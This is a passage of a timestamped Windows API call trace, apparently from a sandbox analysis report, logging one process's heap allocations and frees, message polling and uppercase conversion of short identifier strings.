(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.787] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.788] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.789] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.789] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.789] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.790] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.790] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.790] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.790] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.790] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.791] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.791] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0165.793] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.793] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.793] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.793] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.793] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.794] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.794] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.794] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.795] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.795] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.795] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | 